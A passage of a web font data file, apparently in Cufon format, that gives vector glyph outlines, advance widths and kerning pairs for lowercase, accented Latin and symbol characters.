\u00eb":2,"\u00e8":2,"\u00e9":2,"\u00e7":2,"\u00e5":10,"\u00e3":10,"\u00e4":10,"\u00e2":10,"\u00e0":10,"\u00e1":10,"y":-12,"w":-14,"v":-14,"u":-2,"s":-5,"r":-2,"q":2,"p":-2,"n":-2,"m":-2,"l":-8,"k":-8,"j":-8,"i":-8,"h":-8,"g":-5,"f":-1,"d":2,"c":2,"b":-8,"?":-14,";":-13,":":-13,"\/":10,".":11,"-":8,",":11,"*":-24,"!":-14}},"g":{"d":"4,-117v0,-66,88,-80,132,-50v9,-11,18,-16,32,-15r0,49r-13,0v12,53,-25,76,-83,75v-5,14,8,12,28,12v42,0,66,9,65,49v0,41,-29,62,-86,62v-53,0,-76,-14,-79,-61r53,0v0,9,8,14,23,14v23,0,33,-19,10,-20v-33,-2,-81,-1,-87,-28v-2,-6,18,-26,38,-38v-23,-5,-33,-21,-33,-49xm94,-119v0,-16,-4,-25,-12,-25v-9,0,-13,8,-13,24v0,15,4,23,13,23v8,0,12,-7,12,-22","w":164,"k":{"o":-2,"\u00ff":-13,"\u2019":-18,"\u201d":-18,"\u2014":-3,"\u2013":-3,"\u2026":-11,"\u2122":-12,"\u00ae":-19,"\u00fc":-4,"\u00fb":-4,"\u00f9":-4,"\u00fa":-4,"\u00f5":-2,"\u00f6":-2,"\u00f4":-2,"\u00f2":-2,"\u00f3":-2,"\u00ef":-4,"\u00ee":-4,"\u00ec":-4,"\u00ed":-4,"y":-13,"w":-13,"v":-13,"u":-4,"t":-12,"s":-7,"r":-4,"p":-4,"n":-4,"m":-4,"l":-4,"k":-4,"j":-4,"i":-4,"h":-4,"g":-9,"f":-14,"b":-4,";":-14,":":-11,"\/":-7,".":-11,"-":-3,",":-14,"*":-17,"!":-7}},"h":{"d":"80,-171v40,-21,91,-13,91,45r0,126r-68,0r0,-112v0,-14,-12,-18,-23,-13r0,125r-68,0r0,-239r68,-6r0,74","k":{"\u2019":1,"\u201d":1,"\u2122":10,"*":7}},"i":{"d":"45,-245v18,0,36,11,36,27v1,16,-18,26,-36,26v-18,0,-35,-10,-35,-26v0,-16,18,-27,35,-27xm79,0r-67,0r0,-177r67,-5r0,182","w":90,"k":{"\u2019":-2,"\u201d":-2}},"j":{"d":"45,-245v18,0,36,11,36,27v0,16,-17,26,-35,26v-18,0,-36,-11,-36,-26v0,-16,18,-27,35,-27xm2,43v22,-56,5,-147,10,-220r68,-4v-8,88,26,208,-37,246","w":91,"k":{"\u2019":-2,"\u201d":-2}},"k":{"d":"194,0r-81,0r-34,-70r0,70r-67,0r0,-239r67,-6r0,127r29,-60r73,0r-45,81","w":187,"k":{"\u00ea":12,"\u00b9":1,"o":7,"e":12,"a":1,"\u0119":12,"\u0105":1,"\u00ff":-1,"\u2014":17,"\u2013":17,"\u2026":-12,"\u00f8":7,"\u00fc":4,"\u00fb":4,"\u00f9":4,"\u00fa":4,"\u00f5":7,"\u00f6":7,"\u00f4":7,"\u00f2":7,"\u00f3":7,"\u00eb":12,"\u00e8":12,"\u00e9":12,"\u00e7":11,"\u00e5":1,"\u00e3":1,"\u00e4":1,"\u00e2":1,"\u00e0":1,"\u00e1":1,"y":-1,"u":4,"s":-7,"q":7,"j":-5,"d":7,"c":11,";":-14,":":-12,"\/":-17,".":-12,"-":17,",":-14}},"l":{"d":"79,0r-67,0r0,-239r67,-6r0,245","w":91,"k":{"\u00ef":-18,"\u00ee":-4}},"m":{"d":"161,-166v43,-26,100,-23,100,46r0,120r-67,0r0,-100v3,-21,-7,-32,-24,-25r0,125r-67,0r0,-113v-1,-13,-12,-17,-24,-12r0,125r-67,0r0,-177r67,-5r0,11v23,-14,66,-17,82,5","w":273,"k":{"\u2019":1,"\u201d":1,"\u2122":10,"*":7}},"n":{"d":"79,-171v42,-23,91,-11,91,48r0,123r-67,0r0,-104v0,-20,-8,-25,-24,-21r0,125r-67,0r0,-177r67,-5r0,11","k":{"\u2019":1,"\u201d":1,"\u2122":10,"*":7}},"o":{"d":"88,-182v59,0,85,29,84,93v-1,64,-21,93,-83,94v-62,1,-83,-29,-84,-92v-1,-67,21,-95,83,-95xm89,-40v17,-4,13,-20,14,-49v1,-22,1,-46,-14,-48v-17,5,-14,18,-15,48v0,23,-1,48,15,49","w":176,"k":{"\u00ea":-1,"o":-1,"e":-1,"\u0119":-1,"\u2019":2,"\u201d":2,"\u2014":-5,"\u2013":-5,"\u2026":3,"\u00f8":-1,"\u2122":12,"\u00f5":-1,"\u00f6":-1,"\u00f4":-1,"\u00f2":-1,"\u00f3":-1,"\u00eb":-1,"\u00e8":-1,"\u00e9":-1,"\u00e7":-1,"z":2,"x":7,"s":-1,"q":-1,"g":-1,"f":-1,"d":-1,"c":-1,";":-2,":":-2,"\/":6,".":3,"-":-5,",":3,"*":11}},"p":{"d":"80,-172v57,-30,99,21,99,83v0,63,-46,121,-99,80r0,69r-68,0r0,-237r68,-4r0,9xm108,-89v0,-25,-9,-37,-28,-36r0,71v21,2,28,-8,28,-35","w":184,"k":{"\u00ea":-1,"o":-1,"e":-1,"\u0119":-1,"\u2019":2,"\u201d":2,"\u2014":-5,"\u2013":-5,"\u2026":7,"\u00f8":-1,"\u2122":12,"\u00f5":-1,"\u00f6":-1,"\u00f4":-1,"\u00f2":-1,"\u00f3":-1,"\u00eb":-1,"\u00e8":-1,"\u00e9":-1,"\u00e7":-1,"q":-1,"d":-1,"c":-1,";":-5,":":-5,"\/":6,".":7,"-":-5,",":7,"*":11}},"q":{"d":"5,-87v-5,-65,41,-115,99,-85r0,-5r67,-5r0,241r-67,0r0,-69v-47,40,-107,-13,-99,-77xm104,-126v-23,1,-29,13,-28,40v0,23,6,32,28,32r0,-72","k":{";":-7,",":-7}},"r":{"d":"125,-181r-6,58v-14,-2,-24,-3,-39,0r0,123r-68,0r0,-177r68,-5r0,15v16,-12,25,-17,45,-14","w":124,"k":{"\u00ea":5,"\u00b9":14,"o":4,"e":5,"a":14,"\u0119":5,"\u0105":14,"\u00ff":-10,"\u2019":-11,"\u201d":-11,"\u2014":11,"\u2013":11,"\u2026":32,"\u00f8":7,"\u2122":-12,"\u00ae":-14,"\u00f5":4,"\u00f6":4,"\u00f4":4,"\u00f2":4,"\u00f3":4,"\u00eb":5,"\u00e8":5,"\u00e9":5,"\u00e7":5,"\u00e5":14,"\u00e3":14,"\u00e4":14,"\u00e2":14,"\u00e0":14,"\u00e1":14,"z":-7,"y":-10,"x":-5,"w":-10,"v":-11,"t":-12,"s":-1,"q":5,"g":-2,"f":-13,"d":5,"c":5,"?":5,";":-7,":":-7,"\/":18,".":32,"-":11,",":32,"*":-14,"!":-2}},"s":{"d":"136,-126v-18,-4,-56,-15,-66,-2v4,10,30,12,41,16v26,9,39,26,39,52v2,70,-86,73,-148,57r12,-50v19,9,93,5,50,-12v-37,-3,-61,-23,-60,-56v1,-64,81,-70,144,-54","w":154,"k":{"\u00b9":-2,"a":-2,"\u0105":-2,"\u00ff":-1,"\u2019":-4,"\u201d":-4,"\u2014":-2,"\u2013":-2,"\u00ae":-7,"\u00e5":-2,"\u00e3":-2,"\u00e4":-2,"\u00e2":-2,"\u00e0":-2,"\u00e1":-2,"y":-1,"v":-1,"t":-1,"s":2,"f":-2,"-":-2,"*":-5}},"t":{"d":"107,0v-43,11,-92,7,-92,-40r0,-91r-16,-5r0,-42r16,0r0,-23r67,-7r0,30r24,0r0,42r-24,5r0,79v1,12,15,13,25,8r0,44","w":106,"k":{"\u00ea":4,"\u00b9":-2,"o":1,"e":4,"a":-2,"\u0119":4,"\u0105":-2,"\u00ff":-10,"\u2019":-13,"\u201d":-13,"\u2014":7,"\u2013":7,"\u2026":-13,"\u00f8":1,"\u2122":-12,"\u00ae":-19,"\u00f5":1,"\u00f6":1,"\u00f4":1,"\u00f2":1,"\u00f3":1,"\u00eb":4,"\u00e8":4,"\u00e9":4,"\u00e7":2,"\u00e5":-2,"\u00e3":-2,"\u00e4":-2,"\u00e2":-2,"\u00e0":-2,"\u00e1":-2,"z":-12,"y":-10,"w":-10,"v":-10,"t":-8,"s":-6,"q":2,"d":2,"c":2,"?":-5,";":-13,":":-13,"\/":-14,".":-13,"-":7,",":-13,"*":-12,"!":-5}},"u":{"d":"171,0r-67,0r-1,-7v-39,22,-91,12,-91,-41r0,-129r68,-5r0,113v-1,16,10,21,23,16r0,-125r68,0r0,178"},"v":{"d":"173,-178r-47,178r-85,0r-45,-177r73,-5r18,108r19,-104r67,0","w":168,"k":{"\u00b9":7,"a":7,"\u0105":7,"\u00ff":-13,"\u2019":-17,"\u201d":-17,"\u2026":22,"\u2122":-12,"\u00ae":-14,"\u00e5":7,"\u00e3":7,"\u00e4":7,"\u00e2":7,"\u00e0":7,"\u00e1":7,"y":-13,"w":-14,"v":-14,"t":-13,"s":-4,"?":5,";":-7,":":-7,"\/":13,".":22,",":22,"*":-19,"!":-7}},"w":{"d":"272,-178r-39,178r-76,0r-23,-102r-20,102r-78,0r-38,-177r71,-5r12,100r21,-96r71,0r20,96r15,-96r64,0","w":268,"k":{"\u00b9":6,"a":6,"\u0105":6,"\u00ff":-12,"\u2019":-17,"\u201d":-17,"\u2026":17,"\u2122":-12,"\u00ae":-14,"\u00e5":6,"\u00e3":6,"\u00e4":6,"\u00e2":6,"\u00e0":6,"\u00e1":6,"y":-12,"x":-7,"t":-13,"s":-4,"?":5,";":-8,":":-8,"\/":7,".":17,",":17,"*":-19,"!":-7}},"x":{"d":"171,0r-68,0r-15,-76r-22,76r-68,0r36,-95r-31,-82r71,-5r14,63r17,-59r63,0r-26,83","w":168,"k":{"\u00ea":4,"o":4,"e":4,"\u0119":4,"\u00ff":-7,"\u2019":-11,"\u201d":-11,"\u2014":7,"\u2013":7,"\u2026":-10,"\u00f8":4,"\u2122":-5,"\u00ae":-12,"\u00fc":2,"\u00fb":2,"\u00f9":2,"\u00fa":2,"\u00f5":4,"\u00f6":4,"\u00f4":4,"\u00f2":4,"\u00f3":4,"\u00eb":4,"\u00e8":4,"\u00e9":4,"\u00e7":4,"y":-7,"x":-14,"u":2,"t":-7,"s":-4,"q":4,"g":-2,"d":4,"c":4,";":-12,":":-10,"\/":-22,".":-10,"-":7,",":-12,"*":-17}},"y":{"d":"177,-178r-48,188v-8,59,-61,62,-121,47r13,-45v20,8,49,9,51,-12r-32,0r-42,-177r71,-5r19,104r20,-100r69,0","w":172,"k":{"\u00b9":7,"a":7,"\u0105":7,"\u2019":-17,"\u201d":-17,"\u2026":22,"\u2122":-12,"\u00ae":-14,"\u00e5":7,"\u00e3":7,"\u00e4":7,"\u00e2":7,"\u00e0":7,"\u00e1":7,"z":-8,"t":-13,"s":-5,"g":-2,"f":-12,"?":2,";":-6,":":-6,"\/":12,".":22,",":22,"*":-19,"!":-7}},"z":{"d":"146,-151r-57,101r56,4r0,46r-145,0r0,-27r55,-99r-51,-4r0,-48r142,0r0,27","w":147,"k":{"\u00ea":6,"\u00b9":-2,"o":2,"e":6,"a":-2,"\u0119":6,"\u0105":-2,"\u00ff":-11,"\u2019":-12,"\u201d":-12,"\u2014":7,"\u2013":7,"\u2026":-12,"\u00f8":2,"\u2122":-7,"\u00ae":-14,"\u00f5":2,"\u00f6":2,"\u00f4":2,"\u00f2":2,"\u00f3":2,"\u00eb":6,"\u00e8":6,"\u00e9":6,"\u00e7":4,"\u00e5":-2,"\u00e3":-2,"\u00e4":-2,"\u00e2":-2,"\u00e0":-2,"\u00e1":-2,"z":-12,"y":-11,"w":-11,"v":-11,"s":-5,"q":4,"d":4,"c":4,"?":-5,";":-12,":":-12,"\/":-17,".":-12,"-":7,",":-12,"*":-17,"!":-5}},"{":{"d":"64,-123v42,9,36,64,36,113v0,15,8,23,26,24r0,24v-63,6,-101,-9,-85,-73v9,-34,-1,-71,-29,-76r0,-24v38,-8,28,-57,25,-96v-4,-44,41,-49,89,-46r0,25v-38,0,-23,42,-22,71v0,30,-13,49,-40,58","w":126},"|":{"d":"75,10r-27,0r0,-259r27,0r0,259","w":122},"}":{"d":"0,-277v55,-3,95,1,89,54v-4,34,-10,81,25,88r0,24v-66,12,16,149,-65,148r-49,1r0,-24v41,0,22,-44,22,-73v0,-32,15,-57,40,-64v-44,-11,-35,-58,-35,-104v0,-16,-9,-24,-27,-25r0,-25","w":126},"~":{"d":"99,-120v4,7,20,13,14,20r-17,-17v-7,4,-13,20,-20,14r16,-17v-4,-7,-19,-13,-13,-20r17,17v7,-4,13,-20,20,-14","w":191},"\u00c4":{"d":"211,0r-80,0r-9,-53r-39,0r-9,53r-80,0r59,-240r100,0xm114,-106r-11,-73r-12,73r23,0xm141,-320v16,0,30,11,30,26v0,15,-14,27,-29,27v-16,0,-31,-11,-31,-26v0,-15,15,-27,30,-27xm66,-320v16,0,31,11,30,26v0,15,-15,27,-30,27v-16,0,-31,-11,-31,-26v-1,-15,16,-27,31,-27","w":205},"\u00c5":{"d":"211,0r-80,0r-9,-53r-39,0r-9,53r-80,0r59,-240r100,0xm114,-106r-11,-73r-12,73r23,0xm56,-294v2,-42,91,-44,92,0v-1,43,-91,42,-92,0xm84,-294v1,13,39,12,37,0v-2,-13,-35,-14,-37,0","w":205},"\u00c7":{"d":"86,-119v0,56,31,80,76,60r6,54v-91,31,-163,-17,-163,-114v0,-94,69,-148,158,-116r-8,51v-46,-13,-69,12,-69,65xm63,19v30,-12,73,-12,73,20v0,21,-22,36,-65,46r0,-20v20,-3,31,-10,31,-19v0,-13,-21,-10,-34,-5","w":165},"\u00c9":{"d":"170,0r-158,0r0,-240r158,0r0,53r-79,5r0,33r61,0r0,52r-61,0r0,36r79,5r0,56xm133,-297r-54,36r-20,-16r41,-50","w":174},"\u00d6":{"d":"105,-244v67,0,100,52,100,124v0,72,-32,124,-100,124v-67,0,-100,-51,-100,-122v0,-74,31,-125,100,-126xm125,-120v0,-45,-7,-68,-20,-68v-13,0,-19,22,-19,67v0,46,6,69,19,69v13,0,20,-23,20,-68xm143,-320v16,0,31,11,30,26v0,15,-15,27,-30,27v-16,0,-31,-11,-31,-26v-1,-15,16,-27,31,-27xm67,-320v16,0,31,11,30,26v0,15,-15,27,-30,27v-16,0,-30,-12,-30,-26v0,-15,15,-27,30,-27","w":210,"k":{"Z":6}},"\u00dc":{"d":"92,-62v5,15,29,14,29,-9r0,-169r79,0r0,172v0,50,-40,74,-94,74v-54,0,-93,-24,-94,-74r0,-172r79,0xm143,-320v16,0,30,11,30,26v0,15,-14,27,-29,27v-16,0,-31,-11,-31,-26v0,-15,15,-27,30,-27xm68,-320v16,0,31,11,30,26v0,15,-15,27,-30,27v-16,0,-31,-11,-31,-26v-1,-15,16,-27,31,-27","w":211},"\u00e1":{"d":"22,-171v61,-16,145,-26,145,52r0,119r-63,0r-4,-14v-32,37,-96,16,-96,-39v0,-50,48,-70,96,-54v6,-35,-39,-26,-64,-18xm100,-42r0,-35v-16,-1,-27,4,-27,19v0,13,13,19,27,16xm133,-237r-54,36r-20,-16r41,-50","w":179},"\u00e0":{"d":"22,-171v61,-16,145,-26,145,52r0,119r-63,0r-4,-14v-32,37,-96,16,-96,-39v0,-50,48,-70,96,-54v6,-35,-39,-26,-64,-18xm100,-42r0,-35v-16,-1,-27,4,-27,19v0,13,13,19,27,16xm117,-218r-20,17r-53,-36r32,-31","w":179},"\u00e2":{"d":"22,-171v61,-16,145,-26,145,52r0,119r-63,0r-4,-14v-32,37,-96,16,-96,-39v0,-50,48,-70,96,-54v6,-35,-39,-26,-64,-18xm100,-42r0,-35v-16,-1,-27,4,-27,19v0,13,13,19,27,16xm145,-227r-16,19r-39,-23r-39,23r-17,-19r56,-42","w":179},"\u00e4":{"d":"22,-171v61,-16,145,-26,145,52r0,119r-63,0r-4,-14v-32,37,-96,16,-96,-39v0,-50,48,-70,96,-54v6,-35,-39,-26,-64,-18xm100,-42r0,-35v-16,-1,-27,4,-27,19v0,13,13,19,27,16xm127,-260v15,0,30,12,30,26v0,15,-15,27,-30,27v-16,0,-30,-11,-30,-26v0,-16,15,-27,30,-27xm51,-260v15,0,30,11,30,26v0,15,-14,27,-29,27v-16,0,-31,-11,-31,-26v0,-15,15,-27,30,-27","w":179},"\u00e3":{"d":"22,-171v61,-16,145,-26,145,52r0,119r-63,0r-4,-14v-32,37,-96,16,-96,-39v0,-50,48,-70,96,-54v6,-35,-39,-26,-64,-18xm100,-42r0,-35v-16,-1,-27,4,-27,19v0,13,13,19,27,16xm36,-244v33,-22,75,11,107,-5r0,33v-35,14,-73,-18,-107,4r0,-32","w":179},"\u00e5":{"d":"22,-171v61,-16,145,-26,145,52r0,119r-63,0r-4,-14v-32,37,-96,16,-96,-39v0,-50,48,-70,96,-54v6,-35,-39,-26,-64,-18xm100,-42r0,-35v-16,-1,-27,4,-27,19v0,13,13,19,27,16xm43,-234v1,-43,91,-44,92,0v-1,43,-91,42,-92,0xm70,-234v0,6,11,10,19,9v13,0,19,-3,19,-9v0,-14,-36,-13,-38,0","w":179},"\u00e7":{"d":"5,-89v0,-72,55,-109,123,-85r-8,48v-27,-11,-46,2,-46,37v0,36,22,48,48,35r8,50v-71,25,-125,-9,-125,-85xm41,19v30,-12,74,-12,74,20v0,21,-22,36,-65,46r0,-20v20,-3,30,-10,30,-19v-1,-13,-21,-10,-33,-5","w":128},"\u00e9":{"d":"5,-92v0,-54,28,-89,82,-89v58,0,83,48,74,115r-82,0v4,24,46,24,70,16r10,45v-76,26,-154,0,-154,-87xm102,-105v1,-19,-5,-32,-16,-31v-10,0,-16,10,-16,31r32,0xm134,-237r-53,36r-20,-16r40,-50","w":166},"\u00e8":{"d":"5,-92v0,-54,28,-89,82,-89v58,0,83,48,74,115r-82,0v4,24,46,24,70,16r10,45v-76,26,-154,0,-154,-87xm102,-105v1,-19,-5,-32,-16,-31v-10,0,-16,10,-16,31r32,0xm115,-218r-20,17r-54,-36r33,-31","w":166},"\u00eb":{"d":"5,-92v0,-54,28,-89,82,-89v58,0,83,48,74,115r-82,0v4,24,46,24,70,16r10,45v-76,26,-154,0,-154,-87xm102,-105v1,-19,-5,-32,-16,-31v-10,0,-16,10,-16,31r32,0xm124,-260v15,0,30,12,30,26v0,15,-15,27,-30,27v-16,0,-30,-12,-30,-26v-1,-16,15,-27,30,-27xm48,-260v15,0,31,11,31,26v0,15,-15,27,-30,27v-16,0,-31,-11,-31,-26v0,-15,15,-27,30,-27","w":166},"\u00ed":{"d":"80,0r-68,0r0,-177r68,-5r0,182xm92,-237r-54,36r-19,-16r40,-50","w":91,"k":{"l":-4,"k":-4,"j":-4,"i":-4,"h":-4,"b":-4}},"\u00ec":{"d":"80,0r-68,0r0,-177r68,-5r0,182xm71,-218r-19,17r-54,-36r32,-31","w":91},"\u00ee":{"d":"80,0r-68,0r0,-177r68,-5r0,182xm104,-227r-17,19r-39,-23r-39,23r-16,-19r55,-42","w":91,"k":{"l":-4,"k":-4,"j":-4,"i":-4,"h":-4,"b":-4}},"\u00ef":{"d":"80,0r-68,0r0,-177r68,-5r0,182xm86,-260v15,0,30,12,30,26v0,15,-15,27,-30,27v-16,0,-30,-11,-30,-26v0,-16,15,-27,30,-27xm10,-260v15,0,30,11,30,26v0,15,-14,27,-29,27v-16,0,-31,-11,-31,-26v0,-15,15,-27,30,-27","w":91,"k":{"l":-18,"k":-18,"j":-18,"i":-18,"h":-18,"f":-7,"b":-18}},"\u00f3":{"d":"88,-182v59,0,85,29,84,93v-1,64,-21,93,-83,94v-62,1,-83,-29,-84,-92v-1,-67,21,-95,83,-95xm89,-40v17,-4,13,-20,14,-49v1,-22,1,-46,-14,-48v-17,5,-14,18,-15,48v0,23,-1,48,15,49xm129,-237r-53,36r-20,-16r41,-50","w":176},"\u00f2":{"d":"88,-182v59,0,85,29,84,93v-1,64,-21,93,-83,94v-62,1,-83,-29,-84,-92v-1,-67,21,-95,83,-95xm89,-40v17,-4,13,-20,14,-49v1,-22,1,-46,-14,-48v-17,5,-14,18,-15,48v0,23,-1,48,15,49xm118,-218r-20,17r-54,-36r33,-31","w":176},"\u00f4":{"d":"88,-182v59,0,85,29,84,93v-1,64,-21,93,-83,94v-62,1,-83,-29,-84,-92v-1,-67,21,-95,83,-95xm89,-40v17,-4,13,-20,14,-49v1,-22,1,-46,-14,-48v-17,5,-14,18,-15,48v0,23,-1,48,15,49xm144,-227r-17,19r-39,-23r-39,23r-16,-19r55,-42","w":176},"\u00f6":{"d":"88,-182v59,0,85,29,84,93v-1,64,-21,93,-83,94v-62,1,-83,-29,-84,-92v-1,-67,21,-95,83,-95xm89,-40v17,-4,13,-20,14,-49v1,-22,1,-46,-14,-48v-17,5,-14,18,-15,48v0,23,-1,48,15,49xm126,-260v15,0,30,12,30,26v0,15,-15,27,-30,27v-16,0,-30,-12,-30,-26v0,-15,15,-27,30,-27xm50,-260v15,0,31,11,31,26v0,15,-15,27,-30,27v-16,0,-31,-11,-31,-26v0,-15,15,-27,30,-27","w":176},"\u00f5":{"d":"88,-182v59,0,85,29,84,93v-1,64,-21,93,-83,94v-62,1,-83,-29,-84,-92v-1,-67,21,-95,83,-95xm89,-40v17,-4,13,-20,14,-49v1,-22,1,-46,-14,-48v-17,5,-14,18,-15,48v0,23,-1,48,15,49xm35,-244v33,-22,75,11,107,-5r0,33v-35,14,-73,-18,-107,4r0,-32","w":176},"\u00fa":{"d":"171,0r-67,0r-1,-7v-39,22,-91,12,-91,-41r0,-129r68,-5r0,113v-1,16,10,21,23,16r0,-125r68,0r0,178xm140,-237r-54,36r-20,-16r41,-50"},"\u00f9":{"d":"171,0r-67,0r-1,-7v-39,22,-91,12,-91,-41r0,-129r68,-5r0,113v-1,16,10,21,23,16r0,-125r68,0r0,178xm118,-218r-20,17r-54,-36r33,-31"},"\u00fb":{"d":"171,0r-67,0r-1,-7v-39,22,-91,12,-91,-41r0,-129r68,-5r0,113v-1,16,10,21,23,16r0,-125r68,0r0,178xm147,-227r-16,19r-40,-23r-38,23r-17,-19r55,-42"},"\u00fc":{"d":"171,0r-67,0r-1,-7v-39,22,-91,12,-91,-41r0,-129r68,-5r0,113v-1,16,10,21,23,16r0,-125r68,0r0,178xm129,-260v15,0,30,12,30,26v0,15,-14,27,-29,27v-16,0,-31,-11,-31,-26v0,-15,15,-27,30,-27xm54,-260v15,0,30,12,30,26v0,15,-15,27,-30,27v-16,0,-31,-11,-31,-26v-1,-15,16,-27,31,-27"},"\u00b0":{"d":"50,-245v22,0,42,19,42,42v0,22,-20,43,-42,43v-23,0,-43,-20,-43,-43v0,-23,19,-42,43,-42xm49,-181v12,0,23,-9,22,-22v0,-12,-10,-22,-22,-22v-11,0,-21,10,-21,22v0,12,10,22,21,22","w":98},"\u00a2":{"d":"10,-130v0,-48,20,-79,56,-90r0,-20r43,0r0,19v9,1,17,3,24,6r-8,48v-28,-12,-46,2,-46,37v0,36,22,48,48,35r8,50r-26,7r0,19r-43,0r0,-19v-36,-9,-56,-45,-56,-92","w":146},"\u00a7":{"d":"137,-177v5,-29,-50,-37,-54,-12v26,34,117,27,117,89v0,17,-9,32,-27,46v41,40,-17,95,-71,91v-49,-4,-88,-22,-92,-70r58,0v-2,19,14,29,32,29v24,0,30,-22,10,-29v-39,-13,-105,-30,-105,-74v0,-20,10,-36,31,-48v-44,-40,12,-93,67,-90v56,3,83,21,92,68r-58,0xm137,-81v8,-9,6,-21,-7,-25r-60,-21v-15,34,46,33,67,46","w":204},"\u00b6":{"d":"-12,-155v0,-58,37,-85,101,-85r114,0r0,38r-20,0r0,304r-36,0r0,-304r-36,0r0,304r-36,0r0,-176v-58,2,-87,-30,-87,-81xm27,-155v0,30,16,48,48,46r-1,-93v-32,0,-46,17,-47,47","w":191},"\u00df":{"d":"162,-193v1,18,-27,49,-3,65v19,26,32,39,34,71v3,53,-53,74,-104,56r9,-42v10,6,21,-1,20,-15v-2,-30,-26,-53,-32,-79v1,-9,20,-34,17,-45v0,-10,-3,-15,-11,-15v-12,1,-12,8,-12,26r0,171r-68,0r0,-176v0,-51,31,-68,79,-69v39,-1,71,16,71,52","w":196},"\u00ae":{"d":"119,-245v55,0,101,46,101,101v0,54,-46,100,-100,100v-54,0,-101,-46,-101,-99v0,-55,45,-102,100,-102xm119,-54v49,0,91,-41,91,-90v0,-49,-42,-91,-90,-91v-47,0,-91,41,-91,89v0,50,40,92,90,92xm156,-170v0,16,-11,28,-27,28r37,53r-25,0r-31,-49r0,49r-22,0r0,-108v31,-1,68,-4,68,27xm133,-168v0,-13,-10,-15,-23,-14r0,30v14,1,23,-3,23,-16","w":239},"\u00a9":{"d":"153,-245v69,0,126,57,126,125v0,68,-58,125,-126,125v-66,0,-124,-56,-124,-123v0,-69,56,-127,124,-127xm153,-5v64,0,116,-52,116,-115v0,-63,-53,-115,-116,-115v-62,0,-115,52,-115,113v0,64,52,117,115,117xm105,-118v0,-56,32,-89,85,-70r-4,20v-34,-13,-49,5,-50,51v-1,47,23,61,54,44r3,21v-49,22,-88,-9,-88,-66","w":307},"\u2122":{"d":"172,-132r-19,0r-6,-81r-16,81r-14,0r-15,-81r-6,81r-19,0r10,-108r22,0r15,75r16,-75r22,0xm69,-225r-21,2r0,91r-18,0r0,-91r-22,-2r0,-15r61,0r0,15","w":188},"\u00b4":{"d":"78,-237r-54,36r-19,-16r40,-50","w":83},"\u00a8":{"d":"111,-260v15,0,30,12,30,26v0,15,-15,27,-30,27v-16,0,-31,-11,-31,-26v-1,-15,16,-27,31,-27xm35,-260v15,0,30,12,30,26v0,15,-15,27,-30,27v-16,0,-30,-12,-30,-26v0,-15,15,-27,30,-27","w":145},"\u00d8":{"d":"5,-120v0,-95,76,-153,155,-109r16,-24r24,15r-19,29v48,69,27,213,-76,213v-20,0,-38,-5,-54,-15r-15,23r-24,-15r18,-27v-17,-21,-25,-53,-25,-90xm125,-120v0,-45,-7,-68,-20,-68v-13,0,-19,22,-19,67v0,46,6,69,19,69v13,0,20,-23,20,-68","w":210,"k":{"Z":5}},"\u00b1":{"d":"148,-108r-48,0r0,48r-48,0r0,-47r-48,0r0,-48r48,0r0,-49r48,0r0,49r48,0r0,47xm148,0r-144,0r0,-43r144,0r0,43","w":151},"\u00aa":{"d":"13,-236v44,-12,101,-19,101,36r0,84r-44,0r-3,-10v-23,25,-67,11,-67,-27v0,-34,35,-50,68,-38v4,-24,-28,-19,-45,-13xm49,-157v0,10,8,13,19,12r0,-25v-12,-1,-19,3,-19,13","w":114},"\u00ba":{"d":"61,-244v44,0,59,21,59,66v0,45,-15,66,-59,66v-43,0,-58,-20,-59,-65v0,-47,16,-67,59,-67xm61,-144v15,-2,15,-63,0,-68v-16,3,-15,63,0,68","w":121},"\u00f8":{"d":"5,-88v0,-82,53,-106,123,-88r16,-23r23,15r-15,24v13,14,20,37,20,71v0,82,-53,107,-125,88r-14,22r-23,-16r14,-22v-13,-14,-19,-38,-19,-71xm89,-40v17,-4,13,-20,14,-49v1,-22,1,-46,-14,-48v-17,5,-14,18,-15,48v0,23,-1,48,15,49","w":176},"\u00a1":{"d":"21,-156v2,-34,74,-35,76,0v-1,35,-75,36,-76,0xm101,62r-84,0r20,-176r43,0","w":113},"\u00ac":{"d":"183,-10r-49,0r0,-61r-125,0r0,-47r174,0r0,108","w":191},"\u0192":{"d":"184,-236r-14,44v-12,-5,-29,-1,-28,14r24,0r-4,45r-26,1r-14,139v-3,50,-56,60,-110,47r14,-45v11,5,28,1,29,-12r13,-129r-14,-1r4,-45r15,0v-2,-58,55,-70,111,-58","w":179,"k":{"9":-5,"8":-2,"7":-14,"6":7,"4":22,"3":-14,"2":-5,"1":-5}},"\u00ab":{"d":"150,-152r-24,65r23,63r-34,15r-38,-78r38,-80xm85,-152r-23,65r23,63r-35,15r-38,-78r39,-80","w":161},"\u00bb":{"d":"150,-87r-39,77r-34,-14r24,-63r-23,-65r34,-16xm85,-87r-39,77r-34,-14r24,-63r-22,-65r33,-16","w":162},"\u2026":{"d":"198,-22v1,-35,75,-36,76,0v-2,34,-76,35,-76,0xm102,-22v1,-36,74,-35,76,0v-2,34,-76,35,-76,0xm6,-22v1,-35,74,-36,75,0v-2,34,-75,35,-75,0","w":279,"k":{"\u00ea":8,"\u00c6":15,"\u00a5":-13,"\u00b9":-4,"o":3,"e":8,"a":-4,"W":19,"T":35,"O":15,"C":15,"A":-13,"\u0106":15,"\u0119":8,"\u0105":-4,"\u0104":-13,"\u00d3":15,"\u2019":12,"\u201d":12,"\u00f3":3,"z":-14,"y":19,"x":-10,"w":17,"v":22,"t":4,"s":-8,"q":5,"g":-11,"d":5,"c":5,"Z":-12,"Y":43,"X":-13,"V":29,"U":10,"S":-6,"Q":15,"M":-8,"G":17,"9":12,"7":-4,"6":10,"4":5,"3":-4,"2":-4,"1":-1,"0":15}},"\u00c0":{"d":"211,0r-80,0r-9,-53r-39,0r-9,53r-80,0r59,-240r100,0xm114,-106r-11,-73r-12,73r23,0xm130,-278r-20,17r-54,-36r33,-31","w":205},"\u00c3":{"d":"211,0r-80,0r-9,-53r-39,0r-9,53r-80,0r59,-240r100,0xm114,-106r-11,-73r-12,73r23,0xm49,-304v33,-22,76,12,107,-6r0,33v-34,16,-73,-17,-107,5r0,-32","w":205},"\u00d5":{"d":"105,-244v67,0,100,52,100,124v0,72,-32,124,-100,124v-67,0,-100,-51,-100,-122v0,-74,31,-125,100,-126xm125,-120v0,-45,-7,-68,-20,-68v-13,0,-19,22,-19,67v0,46,6,69,19,69v13,0,20,-23,20,-68xm52,-304v33,-22,75,12,106,-6r0,33v-33,16,-75,-17,-106,5r0,-32","w":210},"\u2013":{"d":"187,-64r-168,0r0,-51r168,0r0,51","w":206,"k":{"\u00ea":-5,"\u00c6":-5,"\u00b9":-4,"o":-5,"e":-5,"a":-4,"W":6,"T":33,"O":-5,"C":-5,"\u0106":-5,"\